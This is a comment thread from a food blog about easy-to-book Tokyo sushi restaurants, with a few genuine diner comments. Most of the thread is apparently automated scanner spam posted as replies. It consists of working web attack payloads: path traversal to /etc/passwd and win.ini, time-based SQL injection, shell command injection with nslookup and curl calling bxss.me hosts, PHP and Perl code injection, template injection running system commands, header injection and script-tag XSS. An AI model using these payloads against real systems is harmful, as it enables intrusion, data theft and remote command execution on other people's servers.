Just went to Sushi Comari on this list, while it wasn't really my cup of tea. Superb CP, 8k Lunch for 13 nigiri. A good spot for travellers on a budget, who want a omakase fix.
Thanks for sharing. Agree with Suzuki and Owana and Tsukiuda is good too but definitely do not recommend Udatsu and Kizaki. Don't think the others are notable.
9 Comments
Link was eaten so here it is again: https://www.luxeat.com/blog/15-easy-to-book-sushi-hotspots-in-tokyo/
re: thetokyogourmet
1CKbkmNi9LO
re: thetokyogourmet
response.write(9134126*9842983)
re: thetokyogourmet
'+response.write(9134126*9842983)+'
re: thetokyogourmet
"+response.write(9134126*9842983)+"
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
%0abcc:074625.67-22134.67.e433e.19990.2@bxss.me
re: thetokyogourmet
${9999762+10000324}
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-22135.67.e433e.19990.2@bxss.me
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
'.gethostbyname(lc('hitfl'.'mxdspwcia48b0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(70).chr(99).chr(77).'
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
)
re: thetokyogourmet
".gethostbyname(lc("hitdy"."sathnnwo6a30e.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(87).chr(99).chr(80)."
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
echo hpmtxn$()\ tijpgj\nz^xyu||a #' &echo hpmtxn$()\ tijpgj\nz^xyu||a #|" &echo hpmtxn$()\ tijpgj\nz^xyu||a #
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
&echo hqbplf$()\ pdxgop\nz^xyu||a #' &echo hqbplf$()\ pdxgop\nz^xyu||a #|" &echo hqbplf$()\ pdxgop\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
|echo mmnpuh$()\ uttbcj\nz^xyu||a #' |echo mmnpuh$()\ uttbcj\nz^xyu||a #|" |echo mmnpuh$()\ uttbcj\nz^xyu||a #
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(109).concat(81).concat(105).concat(73)+(require"socket"
Socket.gethostbyname("hityl"+"mofnpqaffa9fe.bxss.me.")[3].to_s)+"
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
(nslookup hiteecmmdrgxebe739.bxss.me||perl -e "gethostbyname('hiteecmmdrgxebe739.bxss.me')")
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(117).concat(66).concat(110).concat(67)+(require'socket'
Socket.gethostbyname('hitgc'+'ibmiahdj24adb.bxss.me.')[3].to_s)+'
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
$(nslookup hitoywlzkgvnec1226.bxss.me||perl -e "gethostbyname('hitoywlzkgvnec1226.bxss.me')")
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
&nslookup hitblzjyqfhuj5ecf5.bxss.me&'\"`0&nslookup hitblzjyqfhuj5ecf5.bxss.me&`'
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
&(nslookup hitvtgaqtvisy22b0a.bxss.me||perl -e "gethostbyname('hitvtgaqtvisy22b0a.bxss.me')")&'\"`0&(nslookup hitvtgaqtvisy22b0a.bxss.me||perl -e "gethostbyname('hitvtgaqtvisy22b0a.bxss.me')")&`'
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
|(nslookup hitapyncajvurfee6d.bxss.me||perl -e "gethostbyname('hitapyncajvurfee6d.bxss.me')")
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
'"
re: thetokyogourmet
`(nslookup hitdeobdpdwdhaf0e7.bxss.me||perl -e "gethostbyname('hitdeobdpdwdhaf0e7.bxss.me')")`
re: thetokyogourmet
bxss.me
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
<!--
re: thetokyogourmet
;(nslookup hitmnyylwkpwb0aa9c.bxss.me||perl -e "gethostbyname('hitmnyylwkpwb0aa9c.bxss.me')")|(nslookup hitmnyylwkpwb0aa9c.bxss.me||perl -e "gethostbyname('hitmnyylwkpwb0aa9c.bxss.me')")&(nslookup hitmnyylwkpwb0aa9c.bxss.me||perl -e "gethostbyname('hitmnyylwkpwb0aa9c.bxss.me')")
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+277-277-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+277-277-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+157-157-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+157-157-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+385-385-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+385-385-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+733-733-1=0+0+0+1 or 'G0lJ2awH'='
re: thetokyogourmet
-1' OR 3+733-733-1=0+0+0+1 or 'G0lJ2awH'='
re: thetokyogourmet
-1" OR 2+317-317-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+317-317-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
if2WIICI'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 428=(SELECT 428 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 931=(SELECT 931 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
re: thetokyogourmet
8i7Yc0dd' OR 585=(SELECT 585 FROM PG_SLEEP(15))--
re: thetokyogourmet
MxqtfjAe') OR 381=(SELECT 381 FROM PG_SLEEP(15))--
re: thetokyogourmet
3dppO81L')) OR 799=(SELECT 799 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@GUQmW
re: thetokyogourmet
1S3ZSOXRH0
re: thetokyogourmet
response.write(9337054*9281675)
re: thetokyogourmet
'+response.write(9337054*9281675)+'
re: thetokyogourmet
"+response.write(9337054*9281675)+"
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
${9999561+10000351}
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../
re: thetokyogourmet
)
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
redirtest.acx
re: thetokyogourmet
ctime
sleep
p0
(I30
tp1
Rp2
.
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: thetokyogourmet
echo dlzbmh$()\ fxyjxd\nz^xyu||a #' &echo dlzbmh$()\ fxyjxd\nz^xyu||a #|" &echo dlzbmh$()\ fxyjxd\nz^xyu||a #
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
&echo ruludr$()\ vdvjyo\nz^xyu||a #' &echo ruludr$()\ vdvjyo\nz^xyu||a #|" &echo ruludr$()\ vdvjyo\nz^xyu||a #
re: thetokyogourmet
../../../../../../../../../../../../../../etc/shells
re: thetokyogourmet
'.gethostbyname(lc('hittv'.'vmhmfika87300.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(73).chr(110).chr(67).'
re: thetokyogourmet
|echo zzivtu$()\ anmvip\nz^xyu||a #' |echo zzivtu$()\ anmvip\nz^xyu||a #|" |echo zzivtu$()\ anmvip\nz^xyu||a #
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
".gethostbyname(lc("hittu"."ojnhixhl986cf.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(69).chr(98).chr(66)."
re: thetokyogourmet
expr 9000716127 - 944426
re: thetokyogourmet
bxss.me
re: thetokyogourmet
gethostbyname(lc('hitvs'.'ogxgvtgo160dc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(76).chr(104).chr(73)
re: thetokyogourmet
(nslookup -q=cname hittwhtxhxump12c66.bxss.me||curl hittwhtxhxump12c66.bxss.me))
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
$(nslookup -q=cname hitwtrcjbbwync1054.bxss.me||curl hitwtrcjbbwync1054.bxss.me)
re: thetokyogourmet
http://bxss.me/t/fit.txt?.jpg
re: thetokyogourmet
&nslookup -q=cname hittrhkptyamn6dee8.bxss.me&'\"`0&nslookup -q=cname hittrhkptyamn6dee8.bxss.me&`'
re: thetokyogourmet
&(nslookup -q=cname hitkxeezxdnwsbdbba.bxss.me||curl hitkxeezxdnwsbdbba.bxss.me)&'\"`0&(nslookup -q=cname hitkxeezxdnwsbdbba.bxss.me||curl hitkxeezxdnwsbdbba.bxss.me)&`'
re: thetokyogourmet
|(nslookup -q=cname hitpzyqwhhkoz60825.bxss.me||curl hitpzyqwhhkoz60825.bxss.me)
re: thetokyogourmet
'"()
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
`(nslookup -q=cname hitysfbylxfsz98561.bxss.me||curl hitysfbylxfsz98561.bxss.me)`
re: thetokyogourmet
'&&sleep(27*1000)*zbemxt&&'
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
;(nslookup -q=cname hitjflromtsztb7af7.bxss.me||curl hitjflromtsztb7af7.bxss.me)|(nslookup -q=cname hitjflromtsztb7af7.bxss.me||curl hitjflromtsztb7af7.bxss.me)&(nslookup -q=cname hitjflromtsztb7af7.bxss.me||curl hitjflromtsztb7af7.bxss.me)
re: thetokyogourmet
"&&sleep(27*1000)*lyqqxp&&"
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
|(nslookup${IFS}-q${IFS}cname${IFS}hitunpggzwsyx89b3a.bxss.me||curl${IFS}hitunpggzwsyx89b3a.bxss.me)
re: thetokyogourmet
'||sleep(27*1000)*iigukg||'
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
&(nslookup${IFS}-q${IFS}cname${IFS}hitlximkavmgd39b61.bxss.me||curl${IFS}hitlximkavmgd39b61.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitlximkavmgd39b61.bxss.me||curl${IFS}hitlximkavmgd39b61.bxss.me)&`'
re: thetokyogourmet
"||sleep(27*1000)*aulzcy||"
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(103).concat(70).concat(117).concat(73)+(require"socket"
Socket.gethostbyname("hitig"+"vszfmiuw2ca88.bxss.me.")[3].to_s)+"
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(104).concat(68).concat(100).concat(80)+(require'socket'
Socket.gethostbyname('hitjc'+'yqumdfni5381f.bxss.me.')[3].to_s)+'
re: thetokyogourmet
'A'.concat(70-3).concat(22*4).concat(122).concat(71).concat(116).concat(81)+(require'socket'
Socket.gethostbyname('hitjh'+'uodycabvea08a.bxss.me.')[3].to_s)
re: thetokyogourmet
replies
re: thetokyogourmet
'"
re: thetokyogourmet
replies�
re: thetokyogourmet
<!--
re: thetokyogourmet
replies/.
re: thetokyogourmet
'"()&%<zzz><ScRiPt >LyAB(9875)</ScRiPt>
re: thetokyogourmet
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitadgzqtjsdc91d3e.bxss.me")}}
re: thetokyogourmet
'"()&%<zzz><ScRiPt >LyAB(9370)</ScRiPt>
re: thetokyogourmet
9592647
re: thetokyogourmet
VCyIfk6j
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
-1 OR 5*5=25 --
re: thetokyogourmet
-1 OR 5*5=26 --
re: thetokyogourmet
-1 OR 5*5=25
re: thetokyogourmet
-1 OR 5*5=26
re: thetokyogourmet
*if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-1 waitfor delay '0:0:15' --
re: thetokyogourmet
mzYWZE4N'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1 OR 249=(SELECT 249 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1) OR 772=(SELECT 772 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 431=(SELECT 431 FROM PG_SLEEP(15))--
re: thetokyogourmet
dsIaw4sy' OR 519=(SELECT 519 FROM PG_SLEEP(15))--
re: thetokyogourmet
Vipjti1o') OR 112=(SELECT 112 FROM PG_SLEEP(15))--
re: thetokyogourmet
opD8GSoT')) OR 995=(SELECT 995 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
'"
re: thetokyogourmet
@@N1pIr
re: thetokyogourmet
(select 198766*667891)
re: thetokyogourmet
(select 198766*667891 from DUAL)
Some of the pricing info are outdated though. Tokiwazushi is moving to Tokyo Hiroo in March, I assume likely it will no longer be easy to book.
re: guest
1Bq85ct4XiO
re: guest
response.write(9350270*9987587)
re: guest
'+response.write(9350270*9987587)+'
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
"+response.write(9350270*9987587)+"
re: guest
%0abcc:074625.67-22123.67.75275.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22124.67.75275.19990.2@bxss.me
re: guest
${9999604+10000105}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
)
re: guest
'.gethostbyname(lc('hitjx'.'xxgqvtpk309bf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(78).chr(102).chr(67).'
re: guest
file:///etc/passwd
re: guest
!(()&&!|*|*|
re: guest
".gethostbyname(lc("hitsg"."nkrakgbz1196a.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(80).chr(111).chr(74)."
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
^(#$!@#$)(()))******
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
"+"A".concat(70-3).concat(22*4).concat(107).concat(70).concat(115).concat(83)+(require"socket"
Socket.gethostbyname("hitmo"+"ypcozowvb26a0.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
